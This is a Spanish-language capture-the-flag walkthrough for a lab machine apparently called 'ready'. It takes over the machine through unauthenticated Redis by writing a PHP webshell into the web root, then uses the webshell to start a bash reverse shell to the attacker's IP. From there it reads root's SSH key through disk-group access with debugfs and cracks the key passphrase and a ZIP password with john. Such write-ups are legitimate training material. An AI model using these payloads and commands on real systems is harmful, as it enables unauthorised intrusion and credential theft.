Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.16❯ nmap -sCV -p 22,80,6379,8080 -oN 02-targeted.txt 192.168.1.16
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 12:06 -03
Nmap scan report for 192.168.1.16
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 51:f9:f5:59:cd:45:4e:d1:2c:06:41:3b:a6:7a:91:19 (RSA)
| 256 5c:9f:60:b7:c5:50:fc:01:fa:37:7c:dc:16:54:87:3b (ECDSA)
|_ 256 04:da:68:25:69:d6:2a:25:e2:5b:e2:99:36:36:d7:48 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Apache2 Test Debian Default Page: It works
|_http-server-header: Apache/2.4.54 (Debian)
6379/tcp open redis Redis key-value store 6.0.16
8080/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Apache2 Test Debian Default Page: It works
|_http-server-header: Apache/2.4.54 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.81 secondsRedis (6379) está accesible sin autenticación. Aprovechamos esto para escribir una webshell en el DocumentRoot del servidor web (Redis Unauthorized Access RCE):
❯ redis-cli -h 192.168.1.16
192.168.1.16:6379> config set dir /var/www/html
OK
192.168.1.16:6379> config set dbfilename pwned.php
OK
192.168.1.16:6379> set payload "<?php system($_GET['cmd']); ?>"
OK
192.168.1.16:6379> save
OKInvocamos la webshell para obtener una reverse shell como ben:
❯ ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.16:38676.
bash: cannot set terminal process group (430): Inappropriate ioctl for device
bash: no job control in this shell
ben@ready:/var/www/html$El comando se dispara accediendo a
http://192.168.1.16:8080/pwned.php?cmd=bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'.
Obtenemos la primera flag. Para escalar privilegios, revisamos nuestros grupos:
ben@ready:/var/www/html$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben),6(disk)Pertenecemos al grupo disk (Privileged Groups Privesc), que da acceso de bajo nivel a los dispositivos de bloque. Con debugfs leemos cualquier archivo del sistema saltándonos los permisos, en este caso la clave id_rsa de root:
ben@ready:/var/www/html$ df -h
...
/dev/sda1 6.9G 1.7G 4.8G 26% /
...
ben@ready:/var/www/html$ debugfs /dev/sda1
cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,02E266E7A66462FE
...
-----END RSA PRIVATE KEY-----Crackeamos la passphrase con john y nos conectamos como root:
❯ ssh2john.py id_rsa_root > hash
❯ john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
shelly (id_rsa_root)
...
❯ ssh root@192.168.1.16 -i id_rsa_root
Enter passphrase for key 'id_rsa_root': shelly
Linux ready 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64
Last login: Wed Jul 12 18:22:32 2023
root@ready:~#La flag de root está en un ZIP cifrado, así que lo transferimos y crackeamos su contraseña con john:
❯ zip2john root.zip > zip_hash
ver 2.0 efh 5455 efh 7875 root.zip/root.txt PKZIP Encr: TS_chk, cmplen=43, decmplen=32, crc=68F3F801 ts=91CA cs=91ca type=8
❯ john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt zip_hash
...
already (root.zip/root.txt)
...Extraemos la flag y fin.